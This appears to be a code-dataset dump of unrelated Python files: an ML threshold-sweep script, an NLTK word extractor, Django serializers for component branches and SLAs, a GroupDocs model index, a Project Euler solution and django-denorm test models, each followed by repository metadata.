from sklearn.metrics import classification_report
from sklearn.metrics import precision_recall_curve
from sklearn.metrics import roc_auc_score
threshold = 0.0
precision_list = []
recall_list = []
for i in range (1,99):
threshold = i/100
y_pred = classifier.predict(X_test)
y_pred = (y_pred > threshold)
auc = roc_auc_score(y_test, y_pred)
#print('Roc auc score: ' + str(auc))
precision, recall, _ = precision_recall_curve(y_test, y_pred)
score = precision[1] + recall[1]
f1 = f1_score(y_test, y_pred)
#print(str(threshold) + "," + str(f1))
#print(score)
if f1 > f1_max:
f1_max = f1
thres = threshold
#score_max = score
print('f1 score max: ' + str(f1_max))
print('thres: ' + str(thres))
print('precision + recall: ' + str(score))
print('Roc auc score: ' + str(auc))
if score > score_max:
thres = threshold
score_max = score
print('f1 score: ' + str(f1))
print('thres: ' + str(thres))
print('precision + recall max : ' + str(score_max))
print('Roc auc score: ' + str(auc))
if auc > auc_max:
auc_max = auc
thres = threshold
#score_max = score
print('f1 score: ' + str(f1_max))
print('thres: ' + str(thres))
print('precision + recall: ' + str(score_max))
print('Roc auc score max: ' + str(auc_max))
#'''
y_pred = classifier.predict(X_test)
# y_pred = loaded_model.predict(X_test)
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve, auc
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(2):
fpr[i], tpr[i], _ = roc_curve(y_test, y_pred)
roc_auc[i] = auc(fpr[i], tpr[i])
# if roc_auc_score(y_test, y_pred) > maximum:
# # serialize model to YAML
# model_yaml = classifier.to_yaml()
# with open("model.yaml", "w") as yaml_file:
# yaml_file.write(model_yaml)
# # serialize weights to HDF5
# classifier.save_weights("model.h5")
# print("Saved model to disk")
print(roc_auc_score(y_test, y_pred))
total = []
total.append(roc_auc_score(y_test, y_pred))
total.append(epoch)
total.append(i)
with open('H:/Juan Lu/Data/Coxib/test_result.csv','a') as csvoutput:
writer = csv.writer(csvoutput, lineterminator='\n')
writer.writerow(total)  # a single row of [auc, epoch, i]; writerows rejects a flat list of scalars
csvoutput.close()
return roc_auc_score(y_test, y_pred)
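# Editor's sketch (not part of the original script): the tempered sample-weight
# step used inside ann(), shown in isolation. The function name and the
# `temperature` parameter are illustrative only.
def _example_tempered_sample_weights(y, temperature):
    """Return 'balanced' sample weights raised to temperature/2, as above."""
    from sklearn.utils import class_weight
    w = class_weight.compute_sample_weight('balanced', y)
    return w ** (temperature / 2.0)
# e.g. _example_tempered_sample_weights([0, 0, 0, 1], 2) gives roughly
# [0.67, 0.67, 0.67, 2.0] -- the minority class keeps the larger weight.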
score = [0]
#
for unit1 in range(57, 2250, 100):
for epoch in range(500, 3000, 500):
for i in range(1,10):
maximum = max(score)
score.append(ann(i,epoch,maximum,unit1))
#
#plt.figure()
#lw = 1
#plt.plot(fpr[1], tpr[1], color='darkorange', lw=lw, label='ROC curve (area = %0.2f)' % roc_auc[1])
#plt.plot([0, 1], [0, 1], color='navy', linestyle='--')
#plt.xlim([0.0, 1.0])
#plt.ylim([0.0, 1.05])
#plt.xlabel('False Positive Rate')
#plt.ylabel('True Positive Rate')
#plt.title('Receiver operating characteristic')
#plt.legend(loc="lower right")
#plt.show()
#
#
# summarize history for accuracy
#plt.plot(history.history['binary_accuracy'])
#plt.plot(history.history['val_binary_accuracy'])
#plt.title('model accuracy')
#plt.ylabel('accuracy')
#plt.xlabel('epoch')
#plt.legend(['train', 'test'], loc='upper left')
#plt.show()
#
## summarize history for loss
#plt.plot(history.history['loss'])
#plt.plot(history.history['val_loss'])
#plt.title('model loss')
#plt.ylabel('loss')
#plt.xlabel('epoch')
#plt.legend(['train', 'test'], loc='upper left')
#plt.show()
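# Editor's sketch (not part of the original script): a compact version of the
# commented-out threshold sweep above, picking the cut-off that maximises F1.
# `y_true` is a label vector and `y_prob` a NumPy array of predicted
# probabilities; both names are placeholders.
def _example_best_threshold(y_true, y_prob):
    """Return (best_threshold, best_f1) over thresholds 0.01 .. 0.98."""
    from sklearn.metrics import f1_score
    best_thr, best_f1 = 0.0, 0.0
    for k in range(1, 99):
        thr = k / 100.0
        f1 = f1_score(y_true, y_prob > thr)
        if f1 > best_f1:
            best_thr, best_f1 = thr, f1
    return best_thr, best_f1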
| 37.185366
| 168
| 0.579037
|
c69725e309105e48bd6f1ed1d7a844fa2d8d92b7
| 2,299
|
py
|
Python
|
python/get_words.py
|
Eibriel/TokenMenu
|
45890dd9fbf60670870a35aa73d8ac28789013db
|
[
"Apache-2.0"
] | null | null | null |
python/get_words.py
|
Eibriel/TokenMenu
|
45890dd9fbf60670870a35aa73d8ac28789013db
|
[
"Apache-2.0"
] | null | null | null |
python/get_words.py
|
Eibriel/TokenMenu
|
45890dd9fbf60670870a35aa73d8ac28789013db
|
[
"Apache-2.0"
] | null | null | null |
import csv
import json
from nltk.corpus import stopwords
from nltk import download
download('stopwords') # Download stopwords list.
stop_words = stopwords.words('english')
words = []
sentences = []
def preprocess(sentence):
if False:
sentence = sentence.replace("?", "")
sentence = sentence.replace("!", "")
sentence = sentence.replace(",", "")
sentence = sentence.replace(".", "")
sentence = sentence.replace("\"", "")
sentence = sentence.replace("-", "")
sentence = sentence.replace("'", " ")
return [w for w in sentence.lower().split() if w not in stop_words]
return sentence.lower().split()
if False:
with open('simpsons_dataset.csv', 'r', encoding='utf-8') as file:
reader = csv.reader(file)
else:
reader = [
["", "who are you ?"],
["", "where are you from ?"],
["", "my name is anna"],
["", "what time is it ?"],
["", "hi how are you doing ?"],
["", "im fine how about yourself ?"],
["", "im pretty good thanks for asking"],
["", "no problem so how have you been ?"],
["", "ive been great what about you ?"],
["", "ive been good im in school right now"],
["", "what school do you go to ?"],
["", "i go to pcc"],
["", "do you like it there ?"],
["", "its okay its a really big campus"],
["", "good luck with school"],
["", "thank you very much"],
["", "im doing well how about you ?"],
["", "never better thanks"],
["", "it looks like it may rain soon"],
["", "yes and i hope that it does"],
["", "why is that ?"],
["", "i really love how rain clears the air"],
["", "me too it always smells so fresh after it rains"],
["", "yes but i love the night air after it rains"],
["", "really ? why is it ?"],
["", "because you can see the stars perfectly"],
]
for row in reader:
s = preprocess(row[1])
if len(s) > 3:
sentences.append([row[1], s])
words += s
words = list(set(words))
with open("words.json", 'w') as fp:
json.dump(words, fp, sort_keys=True, indent=4)
with open("sentences.json", 'w') as fp:
json.dump(sentences, fp, sort_keys=True, indent=4)
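# Editor's note -- hedged usage example (not part of the original script):
# with the stop-word branch above disabled (the `if False:` block), preprocess
# only lower-cases and whitespace-splits, e.g.
# preprocess("Where are YOU from ?") -> ['where', 'are', 'you', 'from', '?']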
| 31.493151
| 75
| 0.53632
|
3fa795e1521fcc68f0a6f508c6ea922ed0b620fd
| 11,180
|
py
|
Python
|
pdc/apps/componentbranch/serializers.py
|
hluk/product-definition-center
|
af79f73c30fa5f5709ba03d584b7a49b83166b81
|
[
"MIT"
] | 18
|
2015-12-15T17:56:18.000Z
|
2021-04-10T13:49:48.000Z
|
pdc/apps/componentbranch/serializers.py
|
hluk/product-definition-center
|
af79f73c30fa5f5709ba03d584b7a49b83166b81
|
[
"MIT"
] | 303
|
2015-11-18T07:37:06.000Z
|
2021-05-26T12:34:01.000Z
|
pdc/apps/componentbranch/serializers.py
|
hluk/product-definition-center
|
af79f73c30fa5f5709ba03d584b7a49b83166b81
|
[
"MIT"
] | 27
|
2015-11-19T20:33:54.000Z
|
2021-03-25T08:15:28.000Z
|
#
# Copyright (c) 2017 Red Hat
# Licensed under The MIT License (MIT)
# http://opensource.org/licenses/MIT
#
from rest_framework import serializers
from django.conf import settings as django_settings
import re
from datetime import datetime
import six
from pdc.apps.common.fields import ChoiceSlugField
from pdc.apps.component.models import ReleaseComponentType, GlobalComponent
from pdc.apps.componentbranch.models import (
ComponentBranch, SLA, SLAToComponentBranch)
from pdc.apps.common.serializers import StrictSerializerMixin
def is_branch_active(branch):
"""
Checks to see if the branch is active by seeing if there are valid SLAs
tied to the branch
:param branch: a ComponentBranch object
:return: a boolean
"""
slas = branch.slas.all()
today = datetime.utcnow().date()
for sla in slas:
if sla.eol >= today:
# If the branch has at least one SLA that hasn't gone EOL, it is
# still active
return True
return False
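# Editor's note -- hedged illustration (not part of the original module): a
# branch whose SLAs carry EOL dates of 2016-01-01 and 2099-12-31 is reported
# as active, because at least one EOL falls on or after today's UTC date; a
# branch whose every SLA EOL lies in the past is inactive.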
class BranchNameField(serializers.Field):
"""
A serializer field that verifies the branch's name matches policy
"""
doc_format = "string"
@staticmethod
def bad_branch_name(branch_name):
"""
Determines if the branch name collides with the defined regex blacklist
:param branch_name: string representing the branch name
:return: boolean
"""
return django_settings.COMPONENT_BRANCH_NAME_BLACKLIST_REGEX and \
re.match(django_settings.COMPONENT_BRANCH_NAME_BLACKLIST_REGEX,
branch_name)
def to_representation(self, obj):
"""
Serializes the internal value
:param obj: string representing the branch name
:return: string representing the branch name
"""
return obj
def to_internal_value(self, data):
"""
Takes the supplied value and ensures it conforms to branch name
standards such as having a max length of 300 and conforming to the
configured regex.
:param data: the object representing the branch name
:return: the validated branch name
"""
if not isinstance(data, six.text_type):
msg = ('A string was not supplied. The type was "{0}".'
.format(type(data).__name__))
raise serializers.ValidationError(msg)
if len(data) > 300:
raise serializers.ValidationError(
'The string must be less than 300 characters')
if self.bad_branch_name(data):
raise serializers.ValidationError(
'The branch name is not allowed based on the regex "{0}"'
.format(django_settings.COMPONENT_BRANCH_NAME_BLACKLIST_REGEX))
return data
class SLASerializer(StrictSerializerMixin,
serializers.ModelSerializer):
"""
Serializer for the SLA model
"""
class Meta:
model = SLA
fields = ('id', 'name', 'description')
def update(self, instance, validated_data):
"""
Override the update function to not allow a user to modify the SLA name
"""
if 'name' in validated_data and instance.name != validated_data['name']:
error_msg = 'You may not modify the SLA\'s name due to policy'
raise serializers.ValidationError({'name': [error_msg]})
return super(SLASerializer, self).update(instance, validated_data)
class SLAToComponentBranchSerializerForComponentBranch(
serializers.ModelSerializer):
"""
A serializer for the SLAToComponentBranch model to be used in the
ComponentBranch serializer
"""
sla = ChoiceSlugField(slug_field='name', read_only=True)
eol = serializers.DateField(read_only=True)
class Meta:
model = SLAToComponentBranch
fields = ('id', 'sla', 'eol')
class ComponentBranchSerializer(StrictSerializerMixin,
serializers.ModelSerializer):
"""
A serializer for the ComponentBranch model
"""
name = BranchNameField()
global_component = serializers.SlugRelatedField(
slug_field='name', queryset=GlobalComponent.objects.all())
type = ChoiceSlugField(
slug_field='name', queryset=ReleaseComponentType.objects.all())
critical_path = serializers.BooleanField(default=False)
slas = SLAToComponentBranchSerializerForComponentBranch(
many=True, read_only=True)
active = serializers.SerializerMethodField('is_active')
def is_active(self, branch):
"""
Calls the is_branch_active function to determine if the branch is still
active
:param branch: a ComponentBranch object
:return: a boolean
"""
return is_branch_active(branch)
class Meta:
model = ComponentBranch
fields = ('id', 'global_component', 'name', 'slas', 'type', 'active',
'critical_path')
def update(self, instance, validated_data):
"""
Override the update function to not allow a user to modify the branch
name
"""
if 'name' in validated_data and instance.name != validated_data['name']:
raise serializers.ValidationError({
'name': ['You may not modify the branch\'s name due to policy']
})
return super(ComponentBranchSerializer, self).update(
instance, validated_data)
class ComponentBranchSerializerWithoutSLA(serializers.Serializer):
"""
A serializer for the ComponentBranch model to be used in the
SLAToComponentBranch serializer
"""
id = serializers.IntegerField(read_only=True)
name = BranchNameField()
global_component = serializers.SlugRelatedField(
slug_field='name', queryset=GlobalComponent.objects.all())
type = ChoiceSlugField(
slug_field='name', queryset=ReleaseComponentType.objects.all())
critical_path = serializers.BooleanField(required=False)
active = serializers.SerializerMethodField('is_active')
def is_active(self, branch):
"""
Calls the is_branch_active function to determine if the branch is still
active
:param branch: a ComponentBranch object
:return: a boolean
"""
return is_branch_active(branch)
class SLAToComponentBranchSerializer(StrictSerializerMixin,
serializers.Serializer):
"""
A serializer for the SLAToComponentBranch model that allows branch creation
"""
id = serializers.IntegerField(read_only=True)
sla = ChoiceSlugField(slug_field='name', queryset=SLA.objects.all())
branch = ComponentBranchSerializerWithoutSLA()
eol = serializers.DateField()
def create(self, validated_data):
"""
Creates the SLAToComponentBranch entry based on the serialized data
"""
branch_component_type_name = validated_data['branch']['type']
component_type = ReleaseComponentType.objects.filter(
name=branch_component_type_name).first()
if not component_type:
error_msg = (
'The specified ReleaseComponentType "{0}" does not exist'
.format(branch_component_type_name))
raise serializers.ValidationError({'branch.type': [error_msg]})
branch_global_component_name = \
validated_data['branch']['global_component']
branch_global_component = GlobalComponent.objects.filter(
name=branch_global_component_name).first()
if not branch_global_component:
error_msg = ('The specified GlobalComponent "{0}" does not exist'
.format(branch_global_component_name))
raise serializers.ValidationError(
{'branch.global_component': [error_msg]})
branch_name = validated_data['branch']['name']
branch_critical_path = validated_data['branch'].get('critical_path')
branch = ComponentBranch.objects.filter(
name=branch_name,
type=component_type.id,
global_component=branch_global_component.id).first()
if branch:
# The critical_path field is optional, but if it was supplied and it
# doesn't match the found branch's critical_path field, raise an
# error
if branch_critical_path is not None and \
branch.critical_path != branch_critical_path:
error_msg = ('The found branch\'s critical_path field did not '
'match the supplied value')
raise serializers.ValidationError(
{'branch.critical_path': [error_msg]})
else:
# Set the default for this optional value when creating
if branch_critical_path is None:
branch_critical_path = False
branch = ComponentBranch(
name=branch_name,
type=component_type,
global_component=branch_global_component,
critical_path=branch_critical_path,
)
sla_name = validated_data['sla']
sla = SLA.objects.filter(name=sla_name).first()
if not sla:
error_msg = 'The specified SLA "{0}" does not exist'.format(
sla_name)
raise serializers.ValidationError({'sla': [error_msg]})
if SLAToComponentBranch.objects.filter(sla=sla.id, branch=branch.id).exists():
error_msg = (
'The SLA "{0}" tied to the component "{1}" and branch "{2}" '
'already exists').format(sla.name, branch.global_component.name,
branch.name)
raise serializers.ValidationError({'branch': [error_msg]})
# This tells us if the branch object was created or not
if branch._state.adding:
branch.save()
eol = validated_data['eol']
return SLAToComponentBranch.objects.create(
sla=sla, branch=branch, eol=eol)
def update(self, instance, validated_data):
"""
Updates the SLAToComponentBranch entry based on the serialized data
"""
branch = validated_data.get('branch', {})
branch_name = branch.get('name')
component_type = branch.get('type')
global_component = branch.get('global_component')
critical_path = branch.get('critical_path', None)
if branch:
if instance.branch.name != branch_name \
or instance.branch.type != component_type \
or instance.branch.global_component != global_component \
or (critical_path is not None and
instance.branch.critical_path is not critical_path):
raise serializers.ValidationError({
'branch': ['The branch cannot be modified using this API']})
# TODO: Should we not allow this value to change?
instance.sla = validated_data.get('sla', instance.sla)
instance.eol = validated_data.get('eol', instance.eol)
instance.save()
return instance
| 37.77027
| 86
| 0.63873
|
3664ceb34a2b9b706c877de0066d8bb576f3ebdc
| 13,750
|
py
|
Python
|
libs/groupdocs_conversion_cloud/models/__init__.py
|
rocketbot-cl/pdf2word
|
e46f6f574f69aa744e300baf4802e426b71bf9b2
|
[
"MIT"
] | null | null | null |
libs/groupdocs_conversion_cloud/models/__init__.py
|
rocketbot-cl/pdf2word
|
e46f6f574f69aa744e300baf4802e426b71bf9b2
|
[
"MIT"
] | null | null | null |
libs/groupdocs_conversion_cloud/models/__init__.py
|
rocketbot-cl/pdf2word
|
e46f6f574f69aa744e300baf4802e426b71bf9b2
|
[
"MIT"
] | null | null | null |
# coding: utf-8
# flake8: noqa
from __future__ import absolute_import
# import models
from groupdocs_conversion_cloud.models.convert_options import ConvertOptions
from groupdocs_conversion_cloud.models.convert_settings import ConvertSettings
from groupdocs_conversion_cloud.models.disc_usage import DiscUsage
from groupdocs_conversion_cloud.models.document_metadata import DocumentMetadata
from groupdocs_conversion_cloud.models.error import Error
from groupdocs_conversion_cloud.models.error_details import ErrorDetails
from groupdocs_conversion_cloud.models.file_versions import FileVersions
from groupdocs_conversion_cloud.models.files_list import FilesList
from groupdocs_conversion_cloud.models.files_upload_result import FilesUploadResult
from groupdocs_conversion_cloud.models.load_options import LoadOptions
from groupdocs_conversion_cloud.models.object_exist import ObjectExist
from groupdocs_conversion_cloud.models.storage_exist import StorageExist
from groupdocs_conversion_cloud.models.storage_file import StorageFile
from groupdocs_conversion_cloud.models.stored_converted_result import StoredConvertedResult
from groupdocs_conversion_cloud.models.supported_format import SupportedFormat
from groupdocs_conversion_cloud.models.watermark_options import WatermarkOptions
from groupdocs_conversion_cloud.models.cad_load_options import CadLoadOptions
from groupdocs_conversion_cloud.models.csv_load_options import CsvLoadOptions
from groupdocs_conversion_cloud.models.diagram_load_options import DiagramLoadOptions
from groupdocs_conversion_cloud.models.email_load_options import EmailLoadOptions
from groupdocs_conversion_cloud.models.file_version import FileVersion
from groupdocs_conversion_cloud.models.html_convert_options import HtmlConvertOptions
from groupdocs_conversion_cloud.models.image_convert_options import ImageConvertOptions
from groupdocs_conversion_cloud.models.image_load_options import ImageLoadOptions
from groupdocs_conversion_cloud.models.one_load_options import OneLoadOptions
from groupdocs_conversion_cloud.models.pdf_convert_options import PdfConvertOptions
from groupdocs_conversion_cloud.models.pdf_load_options import PdfLoadOptions
from groupdocs_conversion_cloud.models.presentation_convert_options import PresentationConvertOptions
from groupdocs_conversion_cloud.models.presentation_load_options import PresentationLoadOptions
from groupdocs_conversion_cloud.models.spreadsheet_convert_options import SpreadsheetConvertOptions
from groupdocs_conversion_cloud.models.spreadsheet_load_options import SpreadsheetLoadOptions
from groupdocs_conversion_cloud.models.svg_convert_options import SvgConvertOptions
from groupdocs_conversion_cloud.models.txt_convert_options import TxtConvertOptions
from groupdocs_conversion_cloud.models.txt_load_options import TxtLoadOptions
from groupdocs_conversion_cloud.models.word_processing_convert_options import WordProcessingConvertOptions
from groupdocs_conversion_cloud.models.word_processing_load_options import WordProcessingLoadOptions
from groupdocs_conversion_cloud.models.xml_load_options import XmlLoadOptions
from groupdocs_conversion_cloud.models.xps_convert_options import XpsConvertOptions
from groupdocs_conversion_cloud.models.bmp_convert_options import BmpConvertOptions
from groupdocs_conversion_cloud.models.bmp_load_options import BmpLoadOptions
from groupdocs_conversion_cloud.models.cgm_convert_options import CgmConvertOptions
from groupdocs_conversion_cloud.models.dcm_convert_options import DcmConvertOptions
from groupdocs_conversion_cloud.models.dcm_load_options import DcmLoadOptions
from groupdocs_conversion_cloud.models.dgn_load_options import DgnLoadOptions
from groupdocs_conversion_cloud.models.djvu_convert_options import DjvuConvertOptions
from groupdocs_conversion_cloud.models.dng_convert_options import DngConvertOptions
from groupdocs_conversion_cloud.models.dng_load_options import DngLoadOptions
from groupdocs_conversion_cloud.models.doc_convert_options import DocConvertOptions
from groupdocs_conversion_cloud.models.doc_load_options import DocLoadOptions
from groupdocs_conversion_cloud.models.docm_convert_options import DocmConvertOptions
from groupdocs_conversion_cloud.models.docm_load_options import DocmLoadOptions
from groupdocs_conversion_cloud.models.docx_convert_options import DocxConvertOptions
from groupdocs_conversion_cloud.models.docx_load_options import DocxLoadOptions
from groupdocs_conversion_cloud.models.dot_convert_options import DotConvertOptions
from groupdocs_conversion_cloud.models.dot_load_options import DotLoadOptions
from groupdocs_conversion_cloud.models.dotm_convert_options import DotmConvertOptions
from groupdocs_conversion_cloud.models.dotm_load_options import DotmLoadOptions
from groupdocs_conversion_cloud.models.dotx_convert_options import DotxConvertOptions
from groupdocs_conversion_cloud.models.dotx_load_options import DotxLoadOptions
from groupdocs_conversion_cloud.models.dwf_load_options import DwfLoadOptions
from groupdocs_conversion_cloud.models.dwg_load_options import DwgLoadOptions
from groupdocs_conversion_cloud.models.dxf_load_options import DxfLoadOptions
from groupdocs_conversion_cloud.models.emf_convert_options import EmfConvertOptions
from groupdocs_conversion_cloud.models.emf_load_options import EmfLoadOptions
from groupdocs_conversion_cloud.models.eml_load_options import EmlLoadOptions
from groupdocs_conversion_cloud.models.emlx_load_options import EmlxLoadOptions
from groupdocs_conversion_cloud.models.epub_convert_options import EpubConvertOptions
from groupdocs_conversion_cloud.models.gif_convert_options import GifConvertOptions
from groupdocs_conversion_cloud.models.gif_load_options import GifLoadOptions
from groupdocs_conversion_cloud.models.ico_convert_options import IcoConvertOptions
from groupdocs_conversion_cloud.models.ico_load_options import IcoLoadOptions
from groupdocs_conversion_cloud.models.ifc_load_options import IfcLoadOptions
from groupdocs_conversion_cloud.models.igs_load_options import IgsLoadOptions
from groupdocs_conversion_cloud.models.j2c_load_options import J2cLoadOptions
from groupdocs_conversion_cloud.models.j2k_load_options import J2kLoadOptions
from groupdocs_conversion_cloud.models.jp2_load_options import Jp2LoadOptions
from groupdocs_conversion_cloud.models.jpeg_load_options import JpegLoadOptions
from groupdocs_conversion_cloud.models.jpf_load_options import JpfLoadOptions
from groupdocs_conversion_cloud.models.jpg_convert_options import JpgConvertOptions
from groupdocs_conversion_cloud.models.jpg_load_options import JpgLoadOptions
from groupdocs_conversion_cloud.models.jpm_load_options import JpmLoadOptions
from groupdocs_conversion_cloud.models.jpx_load_options import JpxLoadOptions
from groupdocs_conversion_cloud.models.mht_load_options import MhtLoadOptions
from groupdocs_conversion_cloud.models.mobi_load_options import MobiLoadOptions
from groupdocs_conversion_cloud.models.msg_load_options import MsgLoadOptions
from groupdocs_conversion_cloud.models.odg_convert_options import OdgConvertOptions
from groupdocs_conversion_cloud.models.odg_load_options import OdgLoadOptions
from groupdocs_conversion_cloud.models.odp_convert_options import OdpConvertOptions
from groupdocs_conversion_cloud.models.odp_load_options import OdpLoadOptions
from groupdocs_conversion_cloud.models.ods_convert_options import OdsConvertOptions
from groupdocs_conversion_cloud.models.ods_load_options import OdsLoadOptions
from groupdocs_conversion_cloud.models.odt_convert_options import OdtConvertOptions
from groupdocs_conversion_cloud.models.odt_load_options import OdtLoadOptions
from groupdocs_conversion_cloud.models.ost_load_options import OstLoadOptions
from groupdocs_conversion_cloud.models.otp_convert_options import OtpConvertOptions
from groupdocs_conversion_cloud.models.otp_load_options import OtpLoadOptions
from groupdocs_conversion_cloud.models.ots_convert_options import OtsConvertOptions
from groupdocs_conversion_cloud.models.ots_load_options import OtsLoadOptions
from groupdocs_conversion_cloud.models.ott_convert_options import OttConvertOptions
from groupdocs_conversion_cloud.models.ott_load_options import OttLoadOptions
from groupdocs_conversion_cloud.models.plt_load_options import PltLoadOptions
from groupdocs_conversion_cloud.models.png_convert_options import PngConvertOptions
from groupdocs_conversion_cloud.models.png_load_options import PngLoadOptions
from groupdocs_conversion_cloud.models.potm_convert_options import PotmConvertOptions
from groupdocs_conversion_cloud.models.potm_load_options import PotmLoadOptions
from groupdocs_conversion_cloud.models.potx_convert_options import PotxConvertOptions
from groupdocs_conversion_cloud.models.potx_load_options import PotxLoadOptions
from groupdocs_conversion_cloud.models.pps_convert_options import PpsConvertOptions
from groupdocs_conversion_cloud.models.pps_load_options import PpsLoadOptions
from groupdocs_conversion_cloud.models.ppsm_convert_options import PpsmConvertOptions
from groupdocs_conversion_cloud.models.ppsm_load_options import PpsmLoadOptions
from groupdocs_conversion_cloud.models.ppsx_convert_options import PpsxConvertOptions
from groupdocs_conversion_cloud.models.ppsx_load_options import PpsxLoadOptions
from groupdocs_conversion_cloud.models.ppt_convert_options import PptConvertOptions
from groupdocs_conversion_cloud.models.ppt_load_options import PptLoadOptions
from groupdocs_conversion_cloud.models.pptm_convert_options import PptmConvertOptions
from groupdocs_conversion_cloud.models.pptm_load_options import PptmLoadOptions
from groupdocs_conversion_cloud.models.pptx_convert_options import PptxConvertOptions
from groupdocs_conversion_cloud.models.pptx_load_options import PptxLoadOptions
from groupdocs_conversion_cloud.models.psd_convert_options import PsdConvertOptions
from groupdocs_conversion_cloud.models.psd_load_options import PsdLoadOptions
from groupdocs_conversion_cloud.models.pst_load_options import PstLoadOptions
from groupdocs_conversion_cloud.models.rtf_convert_options import RtfConvertOptions
from groupdocs_conversion_cloud.models.stl_load_options import StlLoadOptions
from groupdocs_conversion_cloud.models.tif_load_options import TifLoadOptions
from groupdocs_conversion_cloud.models.tiff_convert_options import TiffConvertOptions
from groupdocs_conversion_cloud.models.tiff_load_options import TiffLoadOptions
from groupdocs_conversion_cloud.models.tsv_convert_options import TsvConvertOptions
from groupdocs_conversion_cloud.models.tsv_load_options import TsvLoadOptions
from groupdocs_conversion_cloud.models.vdw_load_options import VdwLoadOptions
from groupdocs_conversion_cloud.models.vdx_load_options import VdxLoadOptions
from groupdocs_conversion_cloud.models.vsd_load_options import VsdLoadOptions
from groupdocs_conversion_cloud.models.vsdm_load_options import VsdmLoadOptions
from groupdocs_conversion_cloud.models.vsdx_load_options import VsdxLoadOptions
from groupdocs_conversion_cloud.models.vss_load_options import VssLoadOptions
from groupdocs_conversion_cloud.models.vssm_load_options import VssmLoadOptions
from groupdocs_conversion_cloud.models.vssx_load_options import VssxLoadOptions
from groupdocs_conversion_cloud.models.vst_load_options import VstLoadOptions
from groupdocs_conversion_cloud.models.vstm_load_options import VstmLoadOptions
from groupdocs_conversion_cloud.models.vstx_load_options import VstxLoadOptions
from groupdocs_conversion_cloud.models.vsx_load_options import VsxLoadOptions
from groupdocs_conversion_cloud.models.vtx_load_options import VtxLoadOptions
from groupdocs_conversion_cloud.models.webp_convert_options import WebpConvertOptions
from groupdocs_conversion_cloud.models.webp_load_options import WebpLoadOptions
from groupdocs_conversion_cloud.models.wmf_convert_options import WmfConvertOptions
from groupdocs_conversion_cloud.models.wmf_load_options import WmfLoadOptions
from groupdocs_conversion_cloud.models.xls2003_convert_options import Xls2003ConvertOptions
from groupdocs_conversion_cloud.models.xls2003_load_options import Xls2003LoadOptions
from groupdocs_conversion_cloud.models.xls_convert_options import XlsConvertOptions
from groupdocs_conversion_cloud.models.xls_load_options import XlsLoadOptions
from groupdocs_conversion_cloud.models.xlsb_convert_options import XlsbConvertOptions
from groupdocs_conversion_cloud.models.xlsb_load_options import XlsbLoadOptions
from groupdocs_conversion_cloud.models.xlsm_convert_options import XlsmConvertOptions
from groupdocs_conversion_cloud.models.xlsm_load_options import XlsmLoadOptions
from groupdocs_conversion_cloud.models.xlsx_convert_options import XlsxConvertOptions
from groupdocs_conversion_cloud.models.xlsx_load_options import XlsxLoadOptions
from groupdocs_conversion_cloud.models.xltm_convert_options import XltmConvertOptions
from groupdocs_conversion_cloud.models.xltm_load_options import XltmLoadOptions
from groupdocs_conversion_cloud.models.xltx_convert_options import XltxConvertOptions
from groupdocs_conversion_cloud.models.xltx_load_options import XltxLoadOptions
from groupdocs_conversion_cloud.models.j2c_convert_options import J2cConvertOptions
from groupdocs_conversion_cloud.models.j2k_convert_options import J2kConvertOptions
from groupdocs_conversion_cloud.models.jp2_convert_options import Jp2ConvertOptions
from groupdocs_conversion_cloud.models.jpeg_convert_options import JpegConvertOptions
from groupdocs_conversion_cloud.models.jpf_convert_options import JpfConvertOptions
from groupdocs_conversion_cloud.models.jpm_convert_options import JpmConvertOptions
from groupdocs_conversion_cloud.models.jpx_convert_options import JpxConvertOptions
from groupdocs_conversion_cloud.models.tif_convert_options import TifConvertOptions
| 78.571429
| 106
| 0.925164
|
a6f6a341cf14a73b34221eeabab8a24b578a6c7f
| 539
|
py
|
Python
|
151-200/p173.py
|
YiWeiShen/Project-Euler-Hints
|
a79cacab075dd98d393516f083aaa7ffc6115a06
|
[
"MIT"
] | 1
|
2019-02-25T13:00:31.000Z
|
2019-02-25T13:00:31.000Z
|
151-200/p173.py
|
YiWeiShen/Project-Euler-Hints
|
a79cacab075dd98d393516f083aaa7ffc6115a06
|
[
"MIT"
] | null | null | null |
151-200/p173.py
|
YiWeiShen/Project-Euler-Hints
|
a79cacab075dd98d393516f083aaa7ffc6115a06
|
[
"MIT"
] | null | null | null |
def cal_square_num(num):
sum = 0
for i in range(1, int(num/4)+2):
print(i)
if i % 2 == 0:
for j in range(2, int(num/4)+2, 2):
if 0 < i*i-j*j <= num:
sum += 1
else:
continue
else:
for j in range(1, int(num/4)+2, 2):
if 0 < i*i-j*j <= num:
sum += 1
else:
continue
return sum
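# A faster counting sketch (illustrative, not part of the original solution):
# a lamina with outer side n and hole side m uses n**2 - m**2 tiles, and with
# border thickness t = (n - m) // 2 this equals 4*t*(m + t), so for each t the
# hole side m can run from 1 up to limit // (4*t) - t.
def count_laminae(limit):
    total = 0
    t = 1
    while 4 * t * (t + 1) <= limit:  # smallest lamina of thickness t (m = 1) still fits
        total += limit // (4 * t) - t
        t += 1
    return total
# Sanity check: count_laminae(100) == 41, the small case quoted in Project Euler 173.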
if __name__ == '__main__':
print(cal_square_num(10**6))
| 24.5
| 47
| 0.374768
|
4d35126206f2ba9a42970402941202da99e1594a
| 9,148
|
py
|
Python
|
test_denorm_project/test_app/models.py
|
mristroph/django-denorm
|
7d1f720d67e5c58005140aee8d80d0adc6f03efa
|
[
"BSD-3-Clause"
] | 54
|
2015-10-04T07:15:02.000Z
|
2021-11-29T12:38:31.000Z
|
test_denorm_project/test_app/models.py
|
mristroph/django-denorm
|
7d1f720d67e5c58005140aee8d80d0adc6f03efa
|
[
"BSD-3-Clause"
] | 47
|
2015-08-12T12:15:50.000Z
|
2021-09-29T13:04:55.000Z
|
test_denorm_project/test_app/models.py
|
mristroph/django-denorm
|
7d1f720d67e5c58005140aee8d80d0adc6f03efa
|
[
"BSD-3-Clause"
] | 26
|
2015-08-21T18:29:53.000Z
|
2022-03-24T18:59:16.000Z
|
from django.db import connection
from django.conf import settings
from django.db import models
try:
from django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation
except ImportError:
from django.contrib.contenttypes.generic import GenericForeignKey, GenericRelation
from django.contrib import contenttypes
from django.core.cache import cache
from denorm.fields import SumField
from denorm import denormalized, depend_on_related, CountField, CacheKeyField, cached
settings.DENORM_MODEL = 'test_app.RealDenormModel'
class FailingTriggersModelA(models.Model):
order = models.SmallIntegerField(default=0) # Fails for SQLite
SomeWeirdName = models.CharField(max_length=255) # Fails for PostgreSQL
class FailingTriggersModelB(models.Model):
a = models.ForeignKey(FailingTriggersModelA, on_delete=models.CASCADE)
